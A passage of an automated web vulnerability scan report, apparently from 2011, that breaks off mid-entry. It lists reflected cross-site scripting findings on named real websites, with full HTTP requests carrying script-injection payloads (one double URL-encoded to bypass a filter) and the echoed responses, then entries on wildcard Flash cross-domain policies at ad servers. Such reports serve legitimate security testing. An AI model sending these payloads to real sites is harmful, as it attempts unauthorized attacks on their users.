Confidence:   Certain
Host:   http://www.adaeveningnews.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5a78f<script>alert(1)</script>61417a57cf2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?5a78f<script>alert(1)</script>61417a57cf2=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.adaeveningnews.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 301 Moved Permanently
Date: Tue, 03 May 2011 11:04:24 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
X-Content-Type-Warning: guessed from content
Content-Length: 363
Location: http://adaeveningnews.com/favicon.ico?5a78f<script>alert(1)</script>61417a57cf2=1
Cache-Control: max-age=3600
Expires: Tue, 03 May 2011 12:04:24 GMT
Content-Type: text/html;charset=utf-8
X-Cache: MISS from parent2.peak.zope.net
X-Cache: MISS from cache2.peak.zope.net
Via: 1.0 parent2.peak.zope.net:8500 (squid/2.7.STABLE9), 1.0 cache2.peak.zope.net:8500 (squid)
Connection: close

<html>
<head>
<title>Resource Moved</title>
</head>
<body>
<p>This resource has been moved. Click the following link if you are not
automatically redirected: <a href="http://adaeveningnews.com/
...[SNIP]...
</script>61417a57cf2=1">http://adaeveningnews.com/favicon.ico?5a78f<script>alert(1)</script>61417a57cf2=1</a>
...[SNIP]...

6.131. http://www.imaxenes.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imaxenes.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 46a02<script>alert(1)</script>d57d740c7bb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico46a02<script>alert(1)</script>d57d740c7bb HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.imaxenes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 03 May 2011 10:47:37 GMT
Server: tigershark/3.0.128 (dn-fh23.directnic.com)
Location: http://recorta.com/abriendo.html/favicon.ico46a02<script>alert(1)</script>d57d740c7bb
Content-Type: text/html
Content-Length: 1287

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
   <META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
   <STYLE type="text/css">
   <!--
       BODY { margin:
...[SNIP]...
<P class=extra>The file specified (/favicon.ico46a02<script>alert(1)</script>d57d740c7bb) has been moved to <A href="http://recorta.com/abriendo.html/favicon.ico46a02<script>
...[SNIP]...

6.132. http://www.imaxenes.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imaxenes.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36ac2"><script>alert(1)</script>67dcf517012 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico36ac2"><script>alert(1)</script>67dcf517012 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.imaxenes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 03 May 2011 10:47:33 GMT
Server: tigershark/3.0.128 (dn-fh23.directnic.com)
Location: http://recorta.com/abriendo.html/favicon.ico36ac2"><script>alert(1)</script>67dcf517012
Content-Type: text/html
Content-Length: 1293

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
   <META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
   <STYLE type="text/css">
   <!--
       BODY { margin:
...[SNIP]...
<A href="http://recorta.com/abriendo.html/favicon.ico36ac2"><script>alert(1)</script>67dcf517012">
...[SNIP]...

6.133. http://www.nextbigfuture.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nextbigfuture.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d64ef%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3131ff19525 was submitted in the REST URL parameter 1. This input was echoed as d64ef"><script>alert(1)</script>3131ff19525 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /favicon.icod64ef%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3131ff19525 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nextbigfuture.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Tue, 03 May 2011 10:20:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
x-server: ash05
X-AspNet-Version: 2.0.50727
Content-Length: 200
Location: http://nextbigfuture.com/favicon.icod64ef"><script>alert(1)</script>3131ff19525
Cache-Control: private
Content-Type: text/html

<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://nextbigfuture.com/favicon.icod64ef"><script>alert(1)</script>3131ff19525">here</a>.</body>

6.134. http://www.nextbigfuture.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nextbigfuture.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a4bb"><script>alert(1)</script>a355b28398e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?7a4bb"><script>alert(1)</script>a355b28398e=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nextbigfuture.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Tue, 03 May 2011 10:20:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
x-server: ash08
X-AspNet-Version: 2.0.50727
Content-Length: 203
Location: http://nextbigfuture.com/favicon.ico?7a4bb"><script>alert(1)</script>a355b28398e=1
Cache-Control: private
Content-Type: text/html

<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://nextbigfuture.com/favicon.ico?7a4bb"><script>alert(1)</script>a355b28398e=1">here</a>.</body
...[SNIP]...

6.135. http://www.russianeuro.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.russianeuro.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fddd"><script>alert(1)</script>456541e7a00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?8fddd"><script>alert(1)</script>456541e7a00=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.russianeuro.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 03 May 2011 10:57:35 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 269
Location: http://www.russiancupid.com/favicon.ico?8fddd"><script>alert(1)</script>456541e7a00=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.russiancupid.com/favicon.ico?8fddd"><script>alert(1)</script>456541e7a00=1">http://www.russiancupid.com/favico
...[SNIP]...

6.136. http://www.russianeuro.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.russianeuro.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5b9bd<script>alert(1)</script>e449a91ea2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?5b9bd<script>alert(1)</script>e449a91ea2e=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.russianeuro.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 03 May 2011 10:57:35 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 265
Location: http://www.russiancupid.com/favicon.ico?5b9bd<script>alert(1)</script>e449a91ea2e=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.russiancupid.com/favicon.ico?5b9bd<script>alert(1)</script>e449a91ea2e=1">http://www.russiancupid.com/favicon.ico?5b9bd<script>alert(1)</script>e449a91ea2e=1</a>
...[SNIP]...

6.137. http://www.timeswv.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.timeswv.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6d545<script>alert(1)</script>288d9a81df7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico6d545<script>alert(1)</script>288d9a81df7 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.timeswv.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 301 Moved Permanently
Date: Tue, 03 May 2011 10:35:03 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
X-Content-Type-Warning: guessed from content
Content-Length: 343
Location: http://timeswv.com/favicon.ico6d545<script>alert(1)</script>288d9a81df7
Cache-Control: max-age=3600
Expires: Tue, 03 May 2011 11:35:03 GMT
Content-Type: text/html;charset=utf-8
X-Cache: MISS from parent3.peak.zope.net
X-Cache: MISS from cache2.peak.zope.net
Via: 1.0 parent3.peak.zope.net:8500 (squid/2.7.STABLE9), 1.0 cache2.peak.zope.net:8500 (squid)
Connection: close

<html>
<head>
<title>Resource Moved</title>
</head>
<body>
<p>This resource has been moved. Click the following link if you are not
automatically redirected: <a href="http://timeswv.com/favicon
...[SNIP]...
</script>288d9a81df7">http://timeswv.com/favicon.ico6d545<script>alert(1)</script>288d9a81df7</a>
...[SNIP]...

6.138. http://www.timeswv.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.timeswv.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d50cf"><script>alert(1)</script>fb103432d52 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.icod50cf"><script>alert(1)</script>fb103432d52 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.timeswv.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 301 Moved Permanently
Date: Tue, 03 May 2011 10:35:03 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
X-Content-Type-Warning: guessed from content
Content-Length: 347
Location: http://timeswv.com/favicon.icod50cf"><script>alert(1)</script>fb103432d52
Cache-Control: max-age=3600
Expires: Tue, 03 May 2011 11:35:03 GMT
Content-Type: text/html;charset=utf-8
X-Cache: MISS from parent2.peak.zope.net
X-Cache: MISS from cache2.peak.zope.net
Via: 1.0 parent2.peak.zope.net:8500 (squid/2.7.STABLE9), 1.0 cache2.peak.zope.net:8500 (squid)
Connection: close

<html>
<head>
<title>Resource Moved</title>
</head>
<body>
<p>This resource has been moved. Click the following link if you are not
automatically redirected: <a href="http://timeswv.com/favicon.icod50cf"><script>alert(1)</script>fb103432d52">
...[SNIP]...

6.139. http://www.timeswv.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.timeswv.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4f172<script>alert(1)</script>8cbe816c7f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?4f172<script>alert(1)</script>8cbe816c7f5=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.timeswv.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 301 Moved Permanently
Date: Tue, 03 May 2011 10:35:00 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
X-Content-Type-Warning: guessed from content
Content-Length: 349
Location: http://timeswv.com/favicon.ico?4f172<script>alert(1)</script>8cbe816c7f5=1
Cache-Control: max-age=3600
Expires: Tue, 03 May 2011 11:35:00 GMT
Content-Type: text/html;charset=utf-8
X-Cache: MISS from parent3.peak.zope.net
X-Cache: MISS from cache1.peak.zope.net
Via: 1.0 parent3.peak.zope.net:8500 (squid/2.7.STABLE9), 1.0 cache1.peak.zope.net:8500 (squid)
Connection: close

<html>
<head>
<title>Resource Moved</title>
</head>
<body>
<p>This resource has been moved. Click the following link if you are not
automatically redirected: <a href="http://timeswv.com/favicon
...[SNIP]...
</script>8cbe816c7f5=1">http://timeswv.com/favicon.ico?4f172<script>alert(1)</script>8cbe816c7f5=1</a>
...[SNIP]...

6.140. http://www.timeswv.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.timeswv.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21778"><script>alert(1)</script>f0cd34065fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?21778"><script>alert(1)</script>f0cd34065fb=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.timeswv.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 301 Moved Permanently
Date: Tue, 03 May 2011 10:34:59 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
X-Content-Type-Warning: guessed from content
Content-Length: 353
Location: http://timeswv.com/favicon.ico?21778"><script>alert(1)</script>f0cd34065fb=1
Cache-Control: max-age=3600
Expires: Tue, 03 May 2011 11:34:59 GMT
Content-Type: text/html;charset=utf-8
X-Cache: MISS from parent2.peak.zope.net
X-Cache: MISS from cache4.peak.zope.net
Via: 1.0 parent2.peak.zope.net:8500 (squid/2.7.STABLE9), 1.0 cache4.peak.zope.net:8500 (squid)
Connection: close

<html>
<head>
<title>Resource Moved</title>
</head>
<body>
<p>This resource has been moved. Click the following link if you are not
automatically redirected: <a href="http://timeswv.com/favicon.ico?21778"><script>alert(1)</script>f0cd34065fb=1">
...[SNIP]...

7. Flash cross-domain policy  previous  next
There are 285 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


7.1. http://a.collective-media.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.collective-media.net

Response

HTTP/1.0 200 OK
Server: nginx/0.8.53
Content-Type: text/plain
Content-Length: 187
Last-Modified: Tue, 31 Aug 2010 17:41:28 GMT
Accept-Ranges: bytes
Date: Tue, 03 May 2011 15:43:25 GMT
Connection: close
Set-Cookie: JY57=CT; expires=Tue, 31-May-2011 15:43:25 GMT; path=/; domain=.collective-media.net
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain="*" headers="*" secure="true"/>
</cross-domain-policy>

7.2. http://a.tribalfusion.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.3. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Tue, 03 May 2011 15:41:23 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.4. http://ad.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Tue, 03 May 2011 15:41:31 GMT
Content-Type: text/xml;charset=UTF-8
Date: Tue, 03 May 2011 15:41:31 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

7.5. http://ads.pointroll.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:14d1"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 03 May 2011 15:43:36 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

7.6. http://ads.specificmedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.specificmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.specificmedia.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:42:11 GMT
Server: Apache/2.2.15 (Unix) DAV/2 mod_perl/2.0.4 Perl/v5.10.0
Last-Modified: Fri, 16 Oct 2009 21:03:11 GMT
ETag: "54b7f7-110-47613b93bc1c0"
Accept-Ranges: bytes
Content-Length: 272
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://ads.specificmedia.com -->
<cross-d
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.7. http://adserv.impactengine.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserv.impactengine.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adserv.impactengine.com

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 15:40:39 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 26 May 2010 00:07:11 GMT
Accept-Ranges: bytes
Content-Length: 103
Cache-Control: max-age=7200, must-revalidate
Content-Type: text/xml
X-Cache: Miss from cloudfront
X-Amz-Cf-Id: 1cb1071157f224d5a858bf570e3b154a551934c5a1a6da2bf5612b5e9df865af4777337ef35745fb,45d6e4ccdb04fe059afa8c46e5821678d68c542595b1ddb3f2ee45052117214715009bff39f744b3
Via: 1.0 fee706bb2dcbccabb9a09a17e9d6037c.cloudfront.net:11180 (CloudFront), 1.0 6d5d46d2c7dcee5d4601d83b29b92a90.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>


7.8. http://afe.specificclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: afe.specificclick.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/xml
Content-Length: 194
Date: Tue, 03 May 2011 15:42:09 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

7.9. http://aperture.displaymarketplace.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://aperture.displaymarketplace.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: aperture.displaymarketplace.com

Response

HTTP/1.0 200 OK
Content-Length: 268
Content-Type: text/xml
Content-Location: http://aperture.displaymarketplace.com/crossdomain.xml
Last-Modified: Wed, 06 Jan 2010 19:44:14 GMT
Accept-Ranges: bytes
ETag: "88db83a088fca1:96c"
Server: Microsoft-IIS/6.0
X-Server: D2A.NJ-a.dm.com
P3P: CP="NON DEVo PSAo PSDo CONo OUR BUS UNI"
X-Powered-By: ASP.NET
Expires: Tue, 03 May 2011 15:41:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 15:41:31 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
   <site-control perm
...[SNIP]...

7.10. http://ar.voicefive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ar.voicefive.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 03 May 2011 15:42:18 GMT
Content-Type: text/xml
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 230
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
